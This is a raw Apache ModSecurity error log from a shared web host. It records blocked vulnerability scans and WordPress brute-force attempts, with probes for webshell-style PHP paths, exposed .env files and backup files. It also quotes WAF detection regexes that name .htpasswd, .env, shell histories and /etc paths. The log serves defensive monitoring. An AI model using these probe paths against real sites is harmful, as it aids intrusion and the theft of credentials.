[Tue May 26 19:49:41.462921 2026] [security2:error] [pid 86490:tid 86625] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWr_VZMwN0DpLVWo6KGhAAAAIo"]
[Tue May 26 19:49:42.022284 2026] [security2:error] [pid 86490:tid 86673] [client 4.197.75.18:3297] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.75.197.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/simple.php"] [unique_id "ahWr_lZMwN0DpLVWo6KGngAAALo"]
[Tue May 26 19:49:42.022413 2026] [security2:error] [pid 86490:tid 86673] [client 4.197.75.18:3297] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/simple.php"] [unique_id "ahWr_lZMwN0DpLVWo6KGngAAALo"]
[Tue May 26 19:49:43.118553 2026] [security2:error] [pid 86490:tid 86746] [client 4.197.75.18:3299] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.75.197.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/wp-content/plugins/twenty/login.php"] [unique_id "ahWr_1ZMwN0DpLVWo6KGwwAAAQM"]
[Tue May 26 19:49:43.118708 2026] [security2:error] [pid 86490:tid 86746] [client 4.197.75.18:3299] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/wp-content/plugins/twenty/login.php"] [unique_id "ahWr_1ZMwN0DpLVWo6KGwwAAAQM"]
[Tue May 26 19:49:43.939048 2026] [security2:error] [pid 86490:tid 86647] [client 4.197.75.18:3264] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.75.197.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/404.php"] [unique_id "ahWr_1ZMwN0DpLVWo6KG1wAAAKA"]
[Tue May 26 19:49:43.939177 2026] [security2:error] [pid 86490:tid 86647] [client 4.197.75.18:3264] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/404.php"] [unique_id "ahWr_1ZMwN0DpLVWo6KG1wAAAKA"]
[Tue May 26 19:49:43.999063 2026] [security2:error] [pid 86490:tid 86658] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWr_1ZMwN0DpLVWo6KG0AAAAKs"]
[Tue May 26 19:49:44.589753 2026] [security2:error] [pid 86490:tid 86510] [remote 160.250.186.220:54978] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWsAFZMwN0DpLVWo6KG6QAAtBM"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 19:49:44.772654 2026] [security2:error] [pid 86490:tid 86713] [client 4.197.75.18:3273] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.75.197.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/file3.php"] [unique_id "ahWsAFZMwN0DpLVWo6KG7gAAAOI"]
[Tue May 26 19:49:44.772780 2026] [security2:error] [pid 86490:tid 86713] [client 4.197.75.18:3273] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/file3.php"] [unique_id "ahWsAFZMwN0DpLVWo6KG7gAAAOI"]
[Tue May 26 19:49:45.045507 2026] [autoindex:error] [pid 86490:tid 86724] [client 194.163.172.80:54743] AH01276: Cannot serve directory /home1/anujtrad/public_html/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 19:49:45.094743 2026] [security2:error] [pid 86490:tid 86613] [remote 49.12.3.147:37066] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.3.12.49.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWsAFZMwN0DpLVWo6KG7wAA43o"]
[Tue May 26 19:49:45.929577 2026] [security2:error] [pid 86490:tid 86670] [client 4.197.75.18:3309] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.75.197.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/wp-mail.php"] [unique_id "ahWsAVZMwN0DpLVWo6KHEgAAALc"]
[Tue May 26 19:49:45.929706 2026] [security2:error] [pid 86490:tid 86670] [client 4.197.75.18:3309] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/wp-mail.php"] [unique_id "ahWsAVZMwN0DpLVWo6KHEgAAALc"]
[Tue May 26 19:49:46.756635 2026] [security2:error] [pid 86490:tid 86672] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsAlZMwN0DpLVWo6KHHgAAALk"]
[Tue May 26 19:49:46.886711 2026] [security2:error] [pid 86490:tid 86624] [client 4.197.75.18:3339] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.75.197.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/about.php"] [unique_id "ahWsAlZMwN0DpLVWo6KHMQAAAIk"]
[Tue May 26 19:49:46.886794 2026] [security2:error] [pid 86490:tid 86624] [client 4.197.75.18:3339] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/about.php"] [unique_id "ahWsAlZMwN0DpLVWo6KHMQAAAIk"]
[Tue May 26 19:49:47.360189 2026] [security2:error] [pid 86490:tid 86665] [client 4.197.75.18:3319] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.75.197.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/wp.php"] [unique_id "ahWsA1ZMwN0DpLVWo6KHOwAAALI"]
[Tue May 26 19:49:47.360359 2026] [security2:error] [pid 86490:tid 86665] [client 4.197.75.18:3319] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/wp.php"] [unique_id "ahWsA1ZMwN0DpLVWo6KHOwAAALI"]
[Tue May 26 19:49:48.277368 2026] [security2:error] [pid 86490:tid 86525] [remote 45.236.128.46:34526] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 46.128.236.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWsBFZMwN0DpLVWo6KHZQAAkiI"], referer: https://obinnawrites.com/wp-login.php
[Tue May 26 19:49:48.380324 2026] [security2:error] [pid 86490:tid 86726] [client 4.197.75.18:3301] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.75.197.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/.dj/index.php"] [unique_id "ahWsBFZMwN0DpLVWo6KHZwAAAO8"]
[Tue May 26 19:49:48.380448 2026] [security2:error] [pid 86490:tid 86726] [client 4.197.75.18:3301] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/.dj/index.php"] [unique_id "ahWsBFZMwN0DpLVWo6KHZwAAAO8"]
[Tue May 26 19:49:48.503985 2026] [security2:error] [pid 86490:tid 86666] [client 185.177.72.53:6956] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/newsletter.php.old"] [unique_id "ahWsBFZMwN0DpLVWo6KHbQAAALM"]
[Tue May 26 19:49:48.678505 2026] [security2:error] [pid 86490:tid 86702] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsBFZMwN0DpLVWo6KHZAAAANc"]
[Tue May 26 19:49:48.844665 2026] [security2:error] [pid 86490:tid 86687] [client 185.177.72.53:6956] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/go_app/.env"] [unique_id "ahWsBFZMwN0DpLVWo6KHewAAAMg"]
[Tue May 26 19:49:48.913824 2026] [security2:error] [pid 86490:tid 86620] [client 4.197.75.18:3975] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.75.197.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/adminfuns.php"] [unique_id "ahWsBFZMwN0DpLVWo6KHfwAAAIU"]
[Tue May 26 19:49:48.913939 2026] [security2:error] [pid 86490:tid 86620] [client 4.197.75.18:3975] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/adminfuns.php"] [unique_id "ahWsBFZMwN0DpLVWo6KHfwAAAIU"]
[Tue May 26 19:49:49.529473 2026] [security2:error] [pid 86490:tid 86647] [client 185.177.72.53:6956] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/var/www/html/codeigniter/.env"] [unique_id "ahWsBVZMwN0DpLVWo6KHkgAAAKA"]
[Tue May 26 19:49:49.668278 2026] [security2:error] [pid 86490:tid 86712] [client 4.197.75.18:3292] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.75.197.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/php8.php"] [unique_id "ahWsBVZMwN0DpLVWo6KHlgAAAOE"]
[Tue May 26 19:49:49.668394 2026] [security2:error] [pid 86490:tid 86712] [client 4.197.75.18:3292] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/php8.php"] [unique_id "ahWsBVZMwN0DpLVWo6KHlgAAAOE"]
[Tue May 26 19:49:49.698956 2026] [security2:error] [pid 86490:tid 86668] [client 185.177.72.53:6956] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/golang-app/frontend/.env"] [unique_id "ahWsBVZMwN0DpLVWo6KHlwAAALU"]
[Tue May 26 19:49:50.340266 2026] [security2:error] [pid 86490:tid 86714] [client 4.197.75.18:3312] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.75.197.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/classwithtostring.php"] [unique_id "ahWsBlZMwN0DpLVWo6KHqwAAAOM"]
[Tue May 26 19:49:50.340409 2026] [security2:error] [pid 86490:tid 86714] [client 4.197.75.18:3312] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/classwithtostring.php"] [unique_id "ahWsBlZMwN0DpLVWo6KHqwAAAOM"]
[Tue May 26 19:49:50.554150 2026] [security2:error] [pid 86490:tid 86683] [client 185.177.72.53:6956] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/contact.php.copy"] [unique_id "ahWsBlZMwN0DpLVWo6KHsAAAAMQ"]
[Tue May 26 19:49:51.322676 2026] [security2:error] [pid 86490:tid 86640] [client 4.197.75.18:3308] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.75.197.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/info.php"] [unique_id "ahWsB1ZMwN0DpLVWo6KH0QAAAJk"]
[Tue May 26 19:49:51.322790 2026] [security2:error] [pid 86490:tid 86640] [client 4.197.75.18:3308] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/info.php"] [unique_id "ahWsB1ZMwN0DpLVWo6KH0QAAAJk"]
[Tue May 26 19:49:51.325937 2026] [security2:error] [pid 86490:tid 86685] [client 45.154.98.198:57367] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWsB1ZMwN0DpLVWo6KHzQAAAMY"], referer: www.google.com
[Tue May 26 19:49:51.334916 2026] [security2:error] [pid 86490:tid 86677] [client 45.154.98.198:51937] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWsB1ZMwN0DpLVWo6KHzwAAAL4"]
[Tue May 26 19:49:51.383275 2026] [security2:error] [pid 86490:tid 86693] [client 45.154.98.198:51943] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/wp-plain.php"] [unique_id "ahWsB1ZMwN0DpLVWo6KH0AAAAM4"], referer: www.google.com
[Tue May 26 19:49:51.536771 2026] [security2:error] [pid 86490:tid 86708] [client 45.154.98.198:51939] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/mcoqcdns.php"] [unique_id "ahWsB1ZMwN0DpLVWo6KH2gAAAN0"], referer: www.google.com
[Tue May 26 19:49:51.836054 2026] [security2:error] [pid 86490:tid 86662] [client 45.154.98.198:49372] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWsB1ZMwN0DpLVWo6KH5wAAAK8"], referer: www.google.com
[Tue May 26 19:49:51.953918 2026] [security2:error] [pid 86490:tid 86621] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsB1ZMwN0DpLVWo6KH2QAAAIY"]
[Tue May 26 19:49:52.051753 2026] [security2:error] [pid 86490:tid 86653] [client 45.154.98.198:50524] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/wp-plain.php"] [unique_id "ahWsCFZMwN0DpLVWo6KH8wAAAKY"], referer: www.google.com
[Tue May 26 19:49:52.324288 2026] [security2:error] [pid 86490:tid 86620] [client 4.197.75.18:3265] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.75.197.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/ioxi-o.php"] [unique_id "ahWsCFZMwN0DpLVWo6KH-QAAAIU"]
[Tue May 26 19:49:52.324421 2026] [security2:error] [pid 86490:tid 86620] [client 4.197.75.18:3265] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/ioxi-o.php"] [unique_id "ahWsCFZMwN0DpLVWo6KH-QAAAIU"]
[Tue May 26 19:49:52.433481 2026] [security2:error] [pid 86490:tid 86703] [client 185.177.72.53:6956] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/grems-api/.env"] [unique_id "ahWsCFZMwN0DpLVWo6KIAAAAANg"]
[Tue May 26 19:49:52.506067 2026] [security2:error] [pid 86490:tid 86689] [client 45.154.98.198:63551] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/ezophzsh.php"] [unique_id "ahWsCFZMwN0DpLVWo6KIAQAAAMo"], referer: www.google.com
[Tue May 26 19:49:52.604737 2026] [security2:error] [pid 86490:tid 86730] [client 185.177.72.53:6956] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/mongo.php.old"] [unique_id "ahWsCFZMwN0DpLVWo6KIBAAAAPM"]
[Tue May 26 19:49:52.900427 2026] [security2:error] [pid 86490:tid 86680] [client 45.154.98.198:50654] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ivwellnessresources.org"] [uri "/index.php"] [unique_id "ahWsB1ZMwN0DpLVWo6KH6AAAAME"], referer: www.google.com
[Tue May 26 19:49:53.057854 2026] [security2:error] [pid 86490:tid 86646] [client 4.197.75.18:3337] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.75.197.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/011i.php"] [unique_id "ahWsCVZMwN0DpLVWo6KIGwAAAJ8"]
[Tue May 26 19:49:53.057961 2026] [security2:error] [pid 86490:tid 86646] [client 4.197.75.18:3337] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/011i.php"] [unique_id "ahWsCVZMwN0DpLVWo6KIGwAAAJ8"]
[Tue May 26 19:49:53.461711 2026] [security2:error] [pid 86490:tid 86729] [client 185.177.72.53:6956] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/dataset/.env"] [unique_id "ahWsCVZMwN0DpLVWo6KILgAAAPI"]
[Tue May 26 19:49:53.604909 2026] [security2:error] [pid 86490:tid 86657] [client 45.154.98.198:50654] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ivwellnessresources.org"] [uri "/index.php"] [unique_id "ahWsCVZMwN0DpLVWo6KINQAAAKo"], referer: www.google.com
[Tue May 26 19:49:53.631878 2026] [security2:error] [pid 86490:tid 86698] [client 185.177.72.53:6956] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/parity/.env"] [unique_id "ahWsCVZMwN0DpLVWo6KIOQAAANM"]
[Tue May 26 19:49:53.665647 2026] [security2:error] [pid 86490:tid 86642] [client 45.154.98.198:58879] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahWsCVZMwN0DpLVWo6KIOgAAAJs"]
